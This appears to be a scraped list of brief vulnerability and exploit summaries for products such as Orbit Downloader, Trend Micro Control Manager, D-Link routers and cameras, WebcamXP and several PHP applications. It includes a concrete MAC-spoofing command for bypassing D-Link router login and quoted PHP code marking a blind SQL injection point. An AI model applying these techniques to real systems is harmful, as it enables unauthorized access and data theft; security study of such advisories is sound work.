This module exploits a stack-based buffer overflow in Orbit Downloader. The vulnerability is due to Orbit converting an URL ascii string to unicode in a insecure way with MultiByteToWideChar. The vulnerability is exploited with a specially crafted metalink file that should be opened with Orbit through the 'File->Add Metalink...' option.
This module exploits a vulnerability in the CmdProcessor.exe component of Trend Micro Control Manger up to version 5.5. The specific flaw exists within CmdProcessor.exe service running on TCP port 20101. The vulnerable function is the CGenericScheduler::AddTask function of cmdHandlerRedAlertController.dll. When processing a specially crafted IPC packet, controlled data is copied into a 256-byte stack buffer. This can be exploited to execute remote code under the context of the user.
PTK 1.0.5 (and lower) suffer from a CSRF vulnerability which allows an attacker to force administrator/investigator logout at web management interface. Furthermore PTK's default installation (following the procedure indicated into PTK's 'INSTALL' file) doesn't perform 'http to https' redirection in order to secure http connection by transport layer encryption. To default there isn't https redirection in the authentication phase as well as there isn't https redirection during other PTK's activities. If an internal attacker (the nature of this tool makes difficult that PTK may have public ip address) makes an Man in the Middle attack (I successfully made it using Dsniff and Ettercap) the CSRF vulnerability found, forcing the administrator/investigator to logout, will aid the attacker to sniff authentication credentials.
Heap corruption caused by a negative 32bit size value which allows to execute malicious code. The provided proof-of-concept is not optimized but should show a write4 and, (tested on Firefox) EIP pointing to an invalid memory zone.
D-Link DSL-2640B is an ADSL Router using (also) a web management interface. This router allows an attacker to bypass authentication and to login with administrator ('admin') credentials. In fact when the administrator is logged in and an internal attacker will connect to web management interface (default is http://192.168.1.1:80) he will be able to see the MAC Address of logged admin. Symply changing his MAC Address the attacker can bypass authentication and login as administrator. For example in OSX Snow Leopard you can on the fly change your MAC Address with the simple following CLI command: ifconfig en0 ether <admin_mac_address> (where en0 is the name of your network interface)
A directory traversal vulnerability exists in WebcamXP and Webcam7 which allows an attacker to access sensitive files outside of the web root directory. This vulnerability is similar to CVE-2008-5862 but uses backslashes instead of encoded forward slashes.
Dlink DCS is a series of network cameras. These cameras use a web interface which is prone to CSRF vulnerabilities. This flaw allows to change the administrator password.
The vulnerability occurs when a user answers a survey (index.php). The session variables can be freely hacked using the following lines in save.php l.82: if (isset($_POST[$pf])) {$_SESSION[$pf] = $_POST[$pf];} if (!isset($_POST[$pf])) {$_SESSION[$pf] = '';} $pf is user input in the POST variable. Once splitted, SQL request is directly build from those sessions variable by function createinsertquery(), if a special Post variable 'srid' is set both in the variable 'fieldnames' and as simple POST variable (query l. 715 save.php). The user can realize blind SQL injections with specially crafted POST variables.
A local heap overflow vulnerability exists in DAMN Hash Calculator v1.5.1. An attacker can exploit this vulnerability by importing a specially crafted registry file which contains a malicious string of characters. This will cause a buffer overflow and allow the attacker to execute arbitrary code on the vulnerable system.
Unlike CVE-2008-4082, this will work with or without magic_quotes_gpc enabled. By exploiting a vulnerability in the 'plugin' parameter of the 'index.php' page, an attacker can inject a malicious SQL query to extract sensitive information from the database.
Services By CQR